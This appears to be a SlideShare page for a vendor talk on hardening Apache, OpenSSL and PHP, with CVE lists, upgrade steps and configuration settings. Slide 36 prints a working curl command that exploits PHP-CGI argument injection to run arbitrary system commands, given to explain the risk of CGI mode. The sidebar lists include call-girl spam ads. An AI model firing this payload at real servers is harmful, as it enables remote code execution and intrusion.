Submit Search
Upload
Apache web-server-security
•
0 likes
•
102 views
Andrew Carr
Follow
Apache web-server-security
Read less
Read more
Technology
Report
Share
Report
Share
1 of 38
Download now
Download to read offline
Recommended
Cisco Spark & Tropo API Workshop
Cisco Spark & Tropo API Workshop
Cisco DevNet
Cisco APIs: An Interactive Assistant for the Web2Day Developer Conference
Cisco APIs: An Interactive Assistant for the Web2Day Developer Conference
Cisco DevNet
Alfresco security best practices CHECK LIST ONLY
Alfresco security best practices CHECK LIST ONLY
Toni de la Fuente
UKOUG Tech17 - Stay Secure With Oracle Solaris
UKOUG Tech17 - Stay Secure With Oracle Solaris
JomaSoft
44cafe heart bleed
44cafe heart bleed
iphonepentest
Evaluating iOS Applications
Evaluating iOS Applications
iphonepentest
IoT Meets Security
IoT Meets Security
Samsung Open Source Group
IPv6 for Pentesters
IPv6 for Pentesters
NotSoSecure Global Services
Recommended
Cisco Spark & Tropo API Workshop
Cisco Spark & Tropo API Workshop
Cisco DevNet
Cisco APIs: An Interactive Assistant for the Web2Day Developer Conference
Cisco APIs: An Interactive Assistant for the Web2Day Developer Conference
Cisco DevNet
Alfresco security best practices CHECK LIST ONLY
Alfresco security best practices CHECK LIST ONLY
Toni de la Fuente
UKOUG Tech17 - Stay Secure With Oracle Solaris
UKOUG Tech17 - Stay Secure With Oracle Solaris
JomaSoft
44cafe heart bleed
44cafe heart bleed
iphonepentest
Evaluating iOS Applications
Evaluating iOS Applications
iphonepentest
IoT Meets Security
IoT Meets Security
Samsung Open Source Group
IPv6 for Pentesters
IPv6 for Pentesters
NotSoSecure Global Services
Matteo Meucci OWASP Testing Guide v4
Matteo Meucci OWASP Testing Guide v4
Matteo Meucci
[Wroclaw #2] Web Application Security Headers
[Wroclaw #2] Web Application Security Headers
OWASP
LAS16-300K2: Geoff Thorpe - IoT Zephyr
LAS16-300K2: Geoff Thorpe - IoT Zephyr
Shovan Sargunam
Introduction to Optee (26 may 2016)
Introduction to Optee (26 may 2016)
Yannick Gicquel
Custom Rules & Broken Tools
Custom Rules & Broken Tools
NotSoSecure Global Services
Advanced Kurento Real Time Media Stream Processing
Advanced Kurento Real Time Media Stream Processing
FIWARE
HTML5 Multimedia Streaming
HTML5 Multimedia Streaming
EDINA, University of Edinburgh
Operating project
Operating project
ISMAT CH
Kali kinux1
Kali kinux1
Mohammad Mafi
final doc
final doc
Aditya Kushwaha
Resilient IoT Security: The end of flat security models
Resilient IoT Security: The end of flat security models
Milosch Meriac
Owasp testing guide owasp summit 2011 (matteo meucci)
Owasp testing guide owasp summit 2011 (matteo meucci)
Matteo Meucci
" Breaking Extreme Networks WingOS: How to own millions of devices running on...
" Breaking Extreme Networks WingOS: How to own millions of devices running on...
PROIDEA
Why you are not secure: Apache, OpenSSL, and PHP (Intermediate Talk)
Why you are not secure: Apache, OpenSSL, and PHP (Intermediate Talk)
Andrew Carr
SVILUPPO WEB E SICUREZZA NEL 2014
SVILUPPO WEB E SICUREZZA NEL 2014
Massimo Chirivì
Here Be Dragons: Security Maps of the Container New World
Here Be Dragons: Security Maps of the Container New World
C4Media
Software Defined Networking/Openflow: A path to Programmable Networks
Software Defined Networking/Openflow: A path to Programmable Networks
MyNOG
Java script and web cryptography (cf.objective)
Java script and web cryptography (cf.objective)
ColdFusionConference
Q Con New York 2015 Presentation - Conjur
Q Con New York 2015 Presentation - Conjur
conjur_inc
Apache HttpD Web Server - Hardening and other Security Considerations
Apache HttpD Web Server - Hardening and other Security Considerations
Andrew Carr
How to get along with HATEOAS without letting the bad guys steal your lunch?
How to get along with HATEOAS without letting the bad guys steal your lunch?
Graham Charters
iOS application (in)security
iOS application (in)security
iphonepentest
More Related Content
What's hot
Matteo Meucci OWASP Testing Guide v4
Matteo Meucci OWASP Testing Guide v4
Matteo Meucci
[Wroclaw #2] Web Application Security Headers
[Wroclaw #2] Web Application Security Headers
OWASP
LAS16-300K2: Geoff Thorpe - IoT Zephyr
LAS16-300K2: Geoff Thorpe - IoT Zephyr
Shovan Sargunam
Introduction to Optee (26 may 2016)
Introduction to Optee (26 may 2016)
Yannick Gicquel
Custom Rules & Broken Tools
Custom Rules & Broken Tools
NotSoSecure Global Services
Advanced Kurento Real Time Media Stream Processing
Advanced Kurento Real Time Media Stream Processing
FIWARE
HTML5 Multimedia Streaming
HTML5 Multimedia Streaming
EDINA, University of Edinburgh
Operating project
Operating project
ISMAT CH
Kali kinux1
Kali kinux1
Mohammad Mafi
final doc
final doc
Aditya Kushwaha
Resilient IoT Security: The end of flat security models
Resilient IoT Security: The end of flat security models
Milosch Meriac
Owasp testing guide owasp summit 2011 (matteo meucci)
Owasp testing guide owasp summit 2011 (matteo meucci)
Matteo Meucci
" Breaking Extreme Networks WingOS: How to own millions of devices running on...
" Breaking Extreme Networks WingOS: How to own millions of devices running on...
PROIDEA
What's hot
(13)
Matteo Meucci OWASP Testing Guide v4
Matteo Meucci OWASP Testing Guide v4
[Wroclaw #2] Web Application Security Headers
[Wroclaw #2] Web Application Security Headers
LAS16-300K2: Geoff Thorpe - IoT Zephyr
LAS16-300K2: Geoff Thorpe - IoT Zephyr
Introduction to Optee (26 may 2016)
Introduction to Optee (26 may 2016)
Custom Rules & Broken Tools
Custom Rules & Broken Tools
Advanced Kurento Real Time Media Stream Processing
Advanced Kurento Real Time Media Stream Processing
HTML5 Multimedia Streaming
HTML5 Multimedia Streaming
Operating project
Operating project
Kali kinux1
Kali kinux1
final doc
final doc
Resilient IoT Security: The end of flat security models
Resilient IoT Security: The end of flat security models
Owasp testing guide owasp summit 2011 (matteo meucci)
Owasp testing guide owasp summit 2011 (matteo meucci)
" Breaking Extreme Networks WingOS: How to own millions of devices running on...
" Breaking Extreme Networks WingOS: How to own millions of devices running on...
Similar to Apache web-server-security
Why you are not secure: Apache, OpenSSL, and PHP (Intermediate Talk)
Why you are not secure: Apache, OpenSSL, and PHP (Intermediate Talk)
Andrew Carr
SVILUPPO WEB E SICUREZZA NEL 2014
SVILUPPO WEB E SICUREZZA NEL 2014
Massimo Chirivì
Here Be Dragons: Security Maps of the Container New World
Here Be Dragons: Security Maps of the Container New World
C4Media
Software Defined Networking/Openflow: A path to Programmable Networks
Software Defined Networking/Openflow: A path to Programmable Networks
MyNOG
Java script and web cryptography (cf.objective)
Java script and web cryptography (cf.objective)
ColdFusionConference
Q Con New York 2015 Presentation - Conjur
Q Con New York 2015 Presentation - Conjur
conjur_inc
Apache HttpD Web Server - Hardening and other Security Considerations
Apache HttpD Web Server - Hardening and other Security Considerations
Andrew Carr
How to get along with HATEOAS without letting the bad guys steal your lunch?
How to get along with HATEOAS without letting the bad guys steal your lunch?
Graham Charters
iOS application (in)security
iOS application (in)security
iphonepentest
LibreSSL, one year later
LibreSSL, one year later
Giovanni Bechis
Software update for embedded systems
Software update for embedded systems
SZ Lin
Introducing Cloud Development with Project Shipped and Mantl: a deep dive
Introducing Cloud Development with Project Shipped and Mantl: a deep dive
Cisco DevNet
Introducing Cloud Development with Mantl
Introducing Cloud Development with Mantl
Cisco DevNet
21st Docker Switzerland Meetup - ISTIO
21st Docker Switzerland Meetup - ISTIO
Niklaus Hirt
Learn OpenStack from trystack.cn
Learn OpenStack from trystack.cn
OpenCity Community
Zephyr Introduction - Nordic Webinar - Sept. 24.pdf
Zephyr Introduction - Nordic Webinar - Sept. 24.pdf
AswathRangaraj1
Open stackbrief happylearning
Open stackbrief happylearning
Ligong Duan
Managing the SSL Process
Managing the SSL Process
Rocket Software
Building world-class security response and secure development processes
Building world-class security response and secure development processes
David Jorm
POCO C++ Libraries Intro and Overview
POCO C++ Libraries Intro and Overview
Günter Obiltschnig
Similar to Apache web-server-security
(20)
Why you are not secure: Apache, OpenSSL, and PHP (Intermediate Talk)
Why you are not secure: Apache, OpenSSL, and PHP (Intermediate Talk)
SVILUPPO WEB E SICUREZZA NEL 2014
SVILUPPO WEB E SICUREZZA NEL 2014
Here Be Dragons: Security Maps of the Container New World
Here Be Dragons: Security Maps of the Container New World
Software Defined Networking/Openflow: A path to Programmable Networks
Software Defined Networking/Openflow: A path to Programmable Networks
Java script and web cryptography (cf.objective)
Java script and web cryptography (cf.objective)
Q Con New York 2015 Presentation - Conjur
Q Con New York 2015 Presentation - Conjur
Apache HttpD Web Server - Hardening and other Security Considerations
Apache HttpD Web Server - Hardening and other Security Considerations
How to get along with HATEOAS without letting the bad guys steal your lunch?
How to get along with HATEOAS without letting the bad guys steal your lunch?
iOS application (in)security
iOS application (in)security
LibreSSL, one year later
LibreSSL, one year later
Software update for embedded systems
Software update for embedded systems
Introducing Cloud Development with Project Shipped and Mantl: a deep dive
Introducing Cloud Development with Project Shipped and Mantl: a deep dive
Introducing Cloud Development with Mantl
Introducing Cloud Development with Mantl
21st Docker Switzerland Meetup - ISTIO
21st Docker Switzerland Meetup - ISTIO
Learn OpenStack from trystack.cn
Learn OpenStack from trystack.cn
Zephyr Introduction - Nordic Webinar - Sept. 24.pdf
Zephyr Introduction - Nordic Webinar - Sept. 24.pdf
Open stackbrief happylearning
Open stackbrief happylearning
Managing the SSL Process
Managing the SSL Process
Building world-class security response and secure development processes
Building world-class security response and secure development processes
POCO C++ Libraries Intro and Overview
POCO C++ Libraries Intro and Overview
Recently uploaded
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
Enterprise Knowledge
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
Martijn de Jong
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
Earley Information Science
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
Delhi Call girls
Developing An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of Brazil
V3cube
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
HampshireHUG
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101
Paola De la Torre
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path Mount
Puma Security, LLC
Top 5 Benefits OF Using Muvi Live Paywall For Live Streams
Top 5 Benefits OF Using Muvi Live Paywall For Live Streams
Roshan Dwivedi
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
Enterprise Knowledge
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptx
Malak Abu Hammad
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024
The Digital Insurer
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
Principled Technologies
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
vu2urc
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
ThousandEyes
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘
RTylerCroy
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
Pooja Nehwal
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
Michael W. Hawkins
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
Rafal Los
Recently uploaded
(20)
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
Developing An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of Brazil
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path Mount
Top 5 Benefits OF Using Muvi Live Paywall For Live Streams
Top 5 Benefits OF Using Muvi Live Paywall For Live Streams
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptx
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
Apache web-server-security
1.
OpenLogic by Perforce
© Perforce Software, Inc. ANDREW L. CARR | SR. ENTERPRISE ARCHITECH
2.
openlogic.com2 | OpenLogic
by Perforce © Perforce Software, Inc. Confidentiality Statement The information contained in this document is strictly confidential, privileged, and only for the information of the intended recipient. The information contained in this document may not be otherwise used, disclosed, copied, altered, or distributed without the prior written consent of Perforce Software, Inc.
3.
openlogic.com3 | OpenLogic
by Perforce © Perforce Software, Inc. Overview A U G 1 2 , 2 0 2 0 PHP, Apache and OpenSSL Vulnerabilities Andrew Carr Java Developer / Enterprise Architect Started professionally in 2001
4.
openlogic.com4 | OpenLogic
by Perforce © Perforce Software, Inc. Agenda P A T H CORE CONCEPTS Review OpenSSL Review Apache Hardening Review PHP Hardening MODIFYING Modifying the configuration. REMOVING Problematic modules and configurations. ADDING Modules that focus on security.
5.
OpenSSL
6.
openlogic.com6 | OpenLogic
by Perforce © Perforce Software, Inc. OpenSSL is a robust, commercial-grade, and full- featured toolkit for the Transport Layer Security (TLS) and Secure Sockets Layer (SSL) protocols • Provides encryption tools • Allows Apache / Other web servers to encrypt traffic • Provides a lot of other tools
7.
openlogic.com7 | OpenLogic
by Perforce © Perforce Software, Inc. Encryption in Detail T Y P E S O F E N C R Y P T I O N D E F I N I T I O N S Symmetric Key Public Key Cipher Algorithm used for encryption or decryption Algorithm Procedure the encryption process follows Cryptanalysis Study of ciphers and cryptosystems to find weakness
8.
openlogic.com8 | OpenLogic
by Perforce © Perforce Software, Inc. OpenSSL Between 1998 and 2010 - 0.9.1 – 0.9.8 Current version, released 3.0, releaased 2020 Companies currently run production with 0.9.8-1.1.x, 7-12 years old
9.
openlogic.com9 | OpenLogic
by Perforce © Perforce Software, Inc. OpenSSL - CLI ‘openssl version’ ‘openssl version –a’ ’openssl ciphers –v’ (Cipher list, use ’man cipher’ for more information) ‘openssl speed’ (Benchmark Tool)
10.
openlogic.com10 | OpenLogic
by Perforce © Perforce Software, Inc. Heartbleed • Bug is in the OpenSSL's implementation of the TLS/DTLS (transport layer security protocols) heartbeat extension (RFC6520). When it is exploited it leads to the leak of memory contents from the server to the client and from the client to the server. • "Without using any privileged information or credentials we were able steal from ourselves the secret keys used for our X.509 certificates, user names and passwords, instant messages, emails and business critical documents and communication.” • Affects • OpenSSL 1.0.1 through 1.0.1f (inclusive) are vulnerable • OpenSSL 1.0.1g is NOT vulnerable • OpenSSL 1.0.0 branch is NOT vulnerable • OpenSSL 0.9.8 branch is NOT vulnerable • Mitigation • 1.0.1g or newer should be used. • -DOPENSSL_NO_HEARTBEATS.
11.
openlogic.com11 | OpenLogic
by Perforce © Perforce Software, Inc. Heartbleed in the Community Venafi Scan Of Forbes global 2000, more than .5 million hosts are vulnerable. What should they do? Upgrade SSL | Create new keys | Reissue certs
12.
openlogic.com12 | OpenLogic
by Perforce © Perforce Software, Inc. OpenSSL - DOS CVE-2017-3733 What is DOS? Affected versions include 0.9.8 – 1.1.0 (not 1.0.2) Mitigation • Upgrade SSL – 1.1.0e • Use OpenSSL 1.0.2 0.9.8 EOL – Dec 2015 (DO NOT USE)
13.
openlogic.com13 | OpenLogic
by Perforce © Perforce Software, Inc. • Stay current - https://www.openssl.org/news/ • CVEs - https://cve.mitre.org/cgi- bin/cvekey.cgi?keyword=openssl • OpenUpdate from OpenLogic • Ensure your OpenSSL is up-2-date OpenSSL – How To Avoid Vulnerability
14.
openlogic.com14 | OpenLogic
by Perforce © Perforce Software, Inc. • DROWN • A serious vulnerability that affects HTTPS and other services that rely on SSL and TLS, some of the essential cryptographic protocols for Internet security. These protocols allow everyone on the Internet to browse the web, use email, shop online, and send instant messages without third-parties being able to read the communication. • HEARTBLEED • M-I-T-M Attack • DOS Vulnerabilities • Other M-I-T-M • Symatec discovers vulnerability that affects OpenSSL versions 1.0.2c, 1.0.2b, 1.0.1n, and 1.0.1o. Users of versions 1.0.2b and 1.0.2c are advised to immediately upgrade to 1.0.2d. Users of versions 1.0.1n and 1.0.1o are advised to immediately upgrade to 1.0.1p. OpenSSL Vulnerabilities
15.
openlogic.com15 | OpenLogic
by Perforce © Perforce Software, Inc. OpenSSL Installation OpenSSL is preinstalled on a lot of operating systems. Building is simple Get the source Configure Compile Install Reference new SSL when building other products
16.
openlogic.com16 | OpenLogic
by Perforce © Perforce Software, Inc. • Stay Current • This is limited by other software’s ability to update • Normal network safety hardening • Limit of what you can harden with OpenSSL specifically • OpenSSL is used to support the applications we will harden OpenSSL Hardening
17.
Apache Web Server
18.
openlogic.com18 | OpenLogic
by Perforce © Perforce Software, Inc. Apache Web Server A community webserver with prolific implementation Current versions 2.4.29 2.2.34 (FINAL) 2.2 was EOL’d June 2017 with security updates to December 2017 Appx 68 million public instances of Apache Web in use (builtwith.com) More than 70% use vulnerable versions
19.
openlogic.com19 | OpenLogic
by Perforce © Perforce Software, Inc. Apache Vulnerabilities 0 - D A Y – W H A T I S I T ? 2 . 2 V U L N E R A B I L I T I E S OptionsBleed - CVE-2017-9798 • Ignore the htaccess file Unitialized Memory Reflection – CVE-2017-9788 • Affects 2.2.0 – 2.2.32 (fixed in .34) • Reveals confidential information • Authentication Bypass – CVE- 2017-3167
20.
openlogic.com20 | OpenLogic
by Perforce © Perforce Software, Inc. CVE Apache 2.2.22 Vulnerability DOS http://www.cvedetails.com/cve/CVE-2014-0098/ http://www.cvedetails.com/cve/CVE-2013-6438/ http://www.cvedetails.com/cve/CVE-2014-0231/ http://www.cvedetails.com/cve/CVE-2013-1896/ XSS http://www.cvedetails.com/cve/CVE-2012-4558/ http://www.cvedetails.com/cve/CVE-2012-3499/ Code-Exec http://www.cvedetails.com/cve/CVE-2013-1862/
21.
openlogic.com21 | OpenLogic
by Perforce © Perforce Software, Inc. Apache 2.2 Additional Vulnerabilities • important: Uninitialized memory reflection in mod_auth_digest (CVE-2017- 9788) • important: ap_get_basic_auth_pw() Authentication Bypass (CVE-2017- 3167) • important: mod_ssl Null Pointer Dereference (CVE-2017-3169) • important: ap_find_token() Buffer Overread (CVE-2017-7668) • important: mod_mime Buffer Overread (CVE-2017-7679) • important: Apache HTTP Request Parsing Whitespace Defects (CVE-2016- 8743) • n/a: HTTP_PROXY environment variable "httpoxy" mitigation (CVE-2016- 5387) • low: HTTP request smuggling attack against chunked request parser (CVE- 2015-3183) • important: mod_cgid denial of service (CVE-2014-0231) • low: HTTP Trailers processing bypass (CVE-2013-5704) • moderate: mod_deflate denial of service (CVE-2014-0118) • moderate: mod_status buffer overflow (CVE-2014-0226) • low: mod_log_config crash (CVE-2014-0098) • moderate: mod_dav crash (CVE-2013-6438) • low: mod_rewrite log escape filtering (CVE-2013-1862) • moderate: mod_dav crash (CVE-2013-1896) • low: XSS due to unescaped hostnames (CVE-2012-3499) • moderate: XSS in mod_proxy_balancer (CVE-2012-4558) • low: XSS in mod_negotiation when untrusted uploads are supported (CVE- 2012-2687) • Note: This issue is also known as CVE-2008-0455. • low: insecure LD_LIBRARY_PATH handling (CVE-2012-0883) • low: mod_proxy_ajp remote DoS (CVE-2012-4557) • low: mod_setenvif .htaccess privilege escalation (CVE-2011-3607) • low: mod_log_config crash (CVE-2012-0021) • low: scoreboard parent DoS (CVE-2012-0031) • moderate: mod_proxy reverse proxy exposure (CVE-2011-4317) • moderate: error responses can expose cookies (CVE-2012-0053) • low: mod_deflate DoS (CVE-2009-1891) • low: AllowOverride Options handling bypass (CVE-2009-1195) • low: CRLF injection in mod_negotiation when untrusted uploads are supported (CVE-2008-0456) • moderate: APR-util off-by-one overflow (CVE-2009-1956) • moderate: APR-util XML DoS (CVE-2009-1955) • moderate: APR-util heap underwrite (CVE-2009-0023) • important: Timeout detection flaw (mod_proxy_http) (CVE-2010-2791) • low: mod_proxy_ftp globbing XSS (CVE-2008-2939) • low: mod_proxy_balancer CSRF (CVE-2007-6420) • moderate: mod_proxy_http DoS (CVE-2008-2364) • low: mod_proxy_ftp UTF-7 XSS (CVE-2008-0005) • low: mod_proxy_balancer DoS (CVE-2007-6422) • low: mod_proxy_balancer XSS (CVE-2007-6421) • moderate: mod_status XSS (CVE-2007-6388) • moderate: mod_imagemap XSS (CVE-2007-5000) • moderate: mod_proxy crash (CVE-2007-3847) • moderate: mod_status cross-site scripting (CVE-2006-5752) • moderate: Signals to arbitrary processes (CVE-2007-3304) • moderate: mod_cache information leak (CVE-2007-1862) • moderate: mod_cache proxy DoS (CVE-2007-1863) • important: mod_rewrite off-by-one error (CVE-2006-3747) • low: mod_ssl access control DoS (CVE-2005-3357) • moderate: mod_imap Referer Cross-Site Scripting (CVE-2005-3352) • moderate: mod_proxy_ajp remote DoS (CVE-2011-3348) • important: Range header remote DoS (CVE-2011-3192) • Advisory: CVE-2011-3192.txt • moderate: apr_fnmatch flaw leads to mod_autoindex remote DoS (CVE- 2011-0419) • low: expat DoS (CVE-2009-3720) • low: expat DoS (CVE-2009-3560) • low: apr_bridage_split_line DoS (CVE-2010-1623) • important: Timeout detection flaw (mod_proxy_http) (CVE-2010-2068) http://www.apache.org/dist/httpd/patches/apply_to_2.2.15/CVE-2010- 2068-r953616.patch • http://www.apache.org/dist/httpd/patches/apply_to_2.3.5/CVE-2010- 2068-r953418.patch • http://www.apache.org/dist/httpd/binaries/win32/mod_proxy_http-CVE- 2010-2068.zip • low: mod_cache and mod_dav DoS (CVE-2010-1452) • important: mod_isapi module unload flaw (CVE-2010-0425) • low: Subrequest handling of request headers (mod_headers) (CVE-2010- 0434) • moderate: mod_proxy_ajp DoS (CVE-2010-0408) • low: mod_proxy_ftp DoS (CVE-2009-3094) • low: mod_proxy_ftp FTP command injection (CVE-2009-3095) • moderate: Solaris pollset DoS (CVE-2009-2699) • low: APR apr_palloc heap overflow (CVE-2009-2412) • important: mod_proxy reverse proxy DoS (CVE-2009-1890) • important: mod_proxy_ajp information disclosure (CVE-2009-1191)
22.
openlogic.com22 | OpenLogic
by Perforce © Perforce Software, Inc. Apache - Upgrading UPGRADE TO 2.4 Not that complicated Most setups that run 2.2 will run 2.4 http://httpd.apache.org/docs/2.4/upgrading.html 2.2 configuration Order deny,allow Deny from al TO-> Require all denied 2.2 configuration: Order allow,deny Allow from all TO-> Require all granted
23.
openlogic.com23 | OpenLogic
by Perforce © Perforce Software, Inc. • CVE-2009-1891 399 • Mod-Deflate allowing DDOS • Latest affected version is 2.2.11, but there are sporadic reports on early 2.4 • CVE-2009-1890 189 • Mod_proxy_httpallowing DDOS via CPU locking • Latest version 2.3.2, some reports on 2.4.0-.1 • CVE-2013-2249 • Mod_session_dbd module allowing arbitrary command execution via HTTP request containing escape chars • Latest affected version 2.4.4 • CVE-2012-0883 • Envvars-std TROJAN HORSE injection • Version 2.4.2 is affected. Critical Apache 2.4 Vulnerabilities
24.
openlogic.com24 | OpenLogic
by Perforce © Perforce Software, Inc. • What is hardening? • ServerSignature • Turn off • Prevents pages from displaying information about the server • Turn off directory listings • Options • Check for unused modules • Httpd conf • Use groups / users • Httpd conf – user / group Hardening Apache 2
25.
openlogic.com25 | OpenLogic
by Perforce © Perforce Software, Inc. Hardening Apache 2 (cont.) Use Allow and Deny on directories • <Directory> Deny from all Use Install mod_security • Yum install libapache2-modsecurity Install Use mod_evasiveUse Disable Symlinks • -FollowSymLinks Disable Turn off serverside includes • -Includes Turn off
26.
PHP
27.
openlogic.com27 | OpenLogic
by Perforce © Perforce Software, Inc. PHP 5-7 PHP is in use everywhere PHP 5 has over 500 vulnerabilites (Mitre.org) Upgrade to PHP 7 Lots of information on migration http://php.net/manual/en/migration70.php If you have to use 5, harden it
28.
openlogic.com28 | OpenLogic
by Perforce © Perforce Software, Inc. • Affected Versions • 7.3 to 7.3.10 • What is It? • Allows an attacker to execute remote code to gain control of system data • How? • Bug #78559 (Heap Buffer Overflow in mb_eregi) • Mitigation • Upgrade to 7.4 • Apply security hardening principals, like least privilege • Exploits • No current exploits known, that does not mean they don’t exist Remote Code Execution Vulnerability
29.
openlogic.com29 | OpenLogic
by Perforce © Perforce Software, Inc. • Mongo Admin tool • Allows execution of code • Not PHP’s fault • Large negative impact Php 5.5.9 Exploit – Moadmin
30.
openlogic.com30 | OpenLogic
by Perforce © Perforce Software, Inc. Hardening PHP Prevent fOpen wrappers • Allow_url_fopen Prevent Limit process time / input time • Max_input_time • Max_execution_time Limit Limit script memory • Memory_limit Limit Turn Register Globals off • Register_globals Turn
31.
openlogic.com31 | OpenLogic
by Perforce © Perforce Software, Inc. Hardening PHP Don’t expose PHP in response • Expose_php Don’t expose Only use redirect • Cgi.force_redirect Use Impose input restrictions • Post_max_size • Max_input_vars Impose Do not display error information • Display_errors=0 • Display_startup_errors Do not display
32.
openlogic.com32 | OpenLogic
by Perforce © Perforce Software, Inc. Hardening PHP log_errors=1 error_log = <path> Logging Restrict File Access open_basedir = <path> Restrict file_uploads = 0 <or> Upload_max_filesize = 1M File Uploads Session Security Cookie Security Security
33.
openlogic.com33 | OpenLogic
by Perforce © Perforce Software, Inc. • sudo yum install git gcc gcc-c++ libxml2-devel pkgconfig openssl-devel bzip2-devel curl-devel libpng-devel libjpeg-devel libXpm-devel freetype-devel gmp-devel libmcrypt-devel mariadb-devel aspell-devel recode-devel autoconf bison re2c libicu-devel • (Possibly) yum install bison • sudo mkdir /usr/local/php7 • git clone https://github.com/php/php-src.git • cd php-src • git checkout PHP-7.4.9 • ./buildconf –force • ./configure --prefix=/usr/local/php7 --with-config-file-path=/usr/local/php7/etc --with-config-file-scan-dir=/usr/local/php7/etc/conf.d --enable-bcmath --with-bz2 --with-curl --enable-filter --enable-fpm --with-gd --enable-gd-native-ttf --with-freetype-dir --with-jpeg-dir --with-png-dir --enable-intl -- enable-mbstring --with-mcrypt --enable-mysqlnd --with-mysql-sock=/var/lib/mysql/mysql.sock --with-mysqli=mysqlnd --with-pdo-mysql=mysqlnd -- with-pdo-sqlite --disable-phpdbg --disable-phpdbg-webhelper --enable-opcache --with-openssl --enable-simplexml --with-sqlite3 --enable-xmlreader -- enable-xmlwriter --enable-zip --with-zlib • make && make install Building PHP 7
34.
openlogic.com34 | OpenLogic
by Perforce © Perforce Software, Inc. Building PHP 7 H O W T O B U I L D • Get the source • Get the dependencies • Grab additional files for anything you want to enable • ./configure –help is your friend • Ask Perforce experts
35.
openlogic.com35 | OpenLogic
by Perforce © Perforce Software, Inc. A Note About CGI Mode What is it? A mode to serve (interpret) pages without a web server. “Secure” This is supposed to be secure.
36.
openlogic.com36 | OpenLogic
by Perforce © Perforce Software, Inc. Why CGI Mode is NOT Secure Remote Code Execution You are inviting this sort of attack. Common Exploits There are several common exploits to take advantage of this. curl -i -s -k -X 'POST' -H 'User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)' --data-binary "<?php system("$2"); die; ?>" "http://$1/cgibin/php5?%2dd+allow_url_include%3don+%2dd+safe_mode%3doff+%2dd+suhosin%2esimulation%3don+%2dd+disable_functions%3d%22%22+%2d d+open_basedir%3dnone+%2dd+auto_prepend_file%3dphp%3a%2f%2finput+%2dd+cgi%2eforce_redirect%3d0+%2dd+cgi%2eredirect_status_env%3d0+%2dn"
37.
openlogic.com37 | OpenLogic
by Perforce © Perforce Software, Inc. • The web is your friend!!! • Anti-Clickjacking and other practices • https://geekflare.com/10-best-practices-to-secure-and-harden-your-apache-web-server/f • Linux Hardening of Apache • https://wiki.debian.org/Apache/Hardening • PHP Hardening • http://www.hardened-php.net/ Hardening
38.
Q & A
Download now